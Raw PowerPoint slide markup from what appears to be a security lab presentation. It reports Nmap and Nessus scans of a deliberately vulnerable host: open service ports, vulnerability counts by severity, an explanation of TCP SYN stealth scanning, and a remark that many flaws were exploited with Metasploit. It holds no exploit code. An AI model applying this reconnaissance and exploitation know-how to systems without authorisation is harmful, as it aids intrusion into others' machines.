          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3757596" y="1738575"/>
            <a:ext cx="5027324" cy="3404924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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2" name="Shape 332"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Shape 333"/>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Scan Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Shape 334"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Shape 335"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="653084" y="1063376"/>
            <a:ext cx="7837840" cy="4196425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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9" name="Shape 339"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Shape 34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Nessus Results: Potential Vulns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Shape 341"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1209500"/>
            <a:ext cx="3312900" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>21 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>22 SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Telnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>25 SMTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>53 domain (DNS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> (web app)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>111 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rpcbind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>139 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netbios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (Win File + Printer Sharing)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Shape 342"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3312900" y="1209500"/>
            <a:ext cx="3312900" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>445 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>512/3/4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>1099 Java RMI Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>1524 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ingres DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>2049 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nfs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>2121 FTP proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>3306 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Shape 343"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5942925" y="1292825"/>
            <a:ext cx="3312900" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>3632 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DistCCD network job distribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>5432 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PostgreSQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>5900 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VNC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>6000 X GUI login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>6667 IRC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>8009 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>… plus other unknown</a:t>
            </a:r>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7" name="Shape 347"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Shape 348"/>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More about the vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Shape 349"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1200150"/>
            <a:ext cx="9144000" cy="3943499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>9 critical; 6 high; 22 medium; 6 low severity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>125 informational</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>How many correlate to the open ports?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="350" name="Shape 350"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1081297"/>
            <a:ext cx="9143999" cy="2980905"/>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Scanning Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 55"/>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i="1" lang="en"/>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t> Scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(-s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>“Half-open” scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Requires root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send SYN packet, wait for SYN-ACK or RST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If SYN-ACK, kernel sends RST, closes connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If RST, the port is not listening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealthier than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>connect()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, but still commonly monitored</a:t>
            </a:r>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4" name="Shape 354"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Shape 355"/>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‘Critical’ vulns found</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Shape 356"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="357" name="Shape 357"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1174565"/>
            <a:ext cx="9143999" cy="3776869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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 name="Shape 361"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Shape 362"/>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‘High’ vulns found</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="363" name="Shape 363"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1450091"/>
            <a:ext cx="9143998" cy="1721516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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7" name="Shape 367"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Shape 368"/>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‘Medium’ vulns found</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Shape 369"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="370" name="Shape 370"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575101" y="1022937"/>
            <a:ext cx="5993808" cy="4080124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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4" name="Shape 374"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Shape 375"/>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‘Low’ vulns found</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We exploited many of these vulnerabilities w/ Metasploit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="377" name="Shape 377"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="12303" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1200150"/>
            <a:ext cx="9144001" cy="1461641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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1" name="Shape 381"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Shape 38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Ports: Nmap vs Nessus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Shape 383"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="5104200" cy="1738500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
